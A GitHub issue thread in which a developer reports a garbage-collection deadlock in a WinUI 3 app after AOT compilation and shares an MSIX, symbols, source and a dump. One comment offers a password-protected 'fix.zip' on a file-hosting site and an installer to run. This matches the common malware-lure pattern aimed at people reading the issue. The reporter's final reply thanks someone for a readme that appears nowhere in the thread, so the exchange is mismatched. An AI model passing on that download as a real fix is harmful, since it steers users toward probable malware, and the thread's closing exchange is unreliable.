### ISSUE TITLE
GC deadlock when compiled AOT

### ISSUE THREAD

**Issue by FrayxRulez** [microsoft/microsoft-ui-xaml#9928]
### Describe the bug

I'm not sure what's the root cause of the issue, but I'm finding it very hard to investigate from my side.
I ported my app from UWP to WinUI 3, mostly because I'm curious about AOT performances.
I started by porting it to 1.5, and once done I moved to 1.6 preview 2.
I did all the fixes needed by AOT compilation and app works smoothly when launched from Visual Studio (still, as packaged, but this way AOT is only emulated as far as I understand)

The problems start when I actually publish a MSIX package and the code is actually compiled AOT.
The app works, as in, it starts and everything seems to be quite smooth, until the UI thread gets completely stuck.

I know that threading model changes from UWP to WinUI, and that reentrancy protection is gone, but I'm not sure whether this is the root cause of the issue or not and I'm not sure about how to verify this.
Also, if this was the case, I'd expect the freeze to occur whether the app is being compiled AOT or not.

The deadlock seems to happen very randomly (at times I can use the app for minutes, other times just for a couple of seconds, and it doesn't seem to be connected to any specific action) but it always happen on GC waiting for collection to be completed.

I hope that this is enough to investigate the issue:
- [MSIX](https://drive.google.com/file/d/1mShA2XEJqFjbA_2CNlW97-IfWHH2T-J7/view)
- [PDBs](https://drive.google.com/file/d/1JXo8MOg6nsHD3dpXV0xdbtnywa7FQxdO/view)
- [Source code](https://github.com/UnigramDev/Unigram/tree/test)
- [Mini dump in lock state](https://drive.google.com/file/d/1MduYdA5MmxtLxNUGcSWgQp3K26L_aYjE/view?usp=sharing)

In case, I can provide a full dump as well, but I'd prefer to share it privately.

### Steps to reproduce the bug

- Launch the MSIX
- Use the app for a while

### NuGet package version

WinUI 3 - Windows App SDK 1.6 Preview 2: 1.6.240821007-preview2

**Comment by chenshupe** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by FrayxRulez** [comment]
Had the feeling that this was caused by the runtime, but I was told to open the issue here. Thanks for pointing out the cause, completely missed that readme!
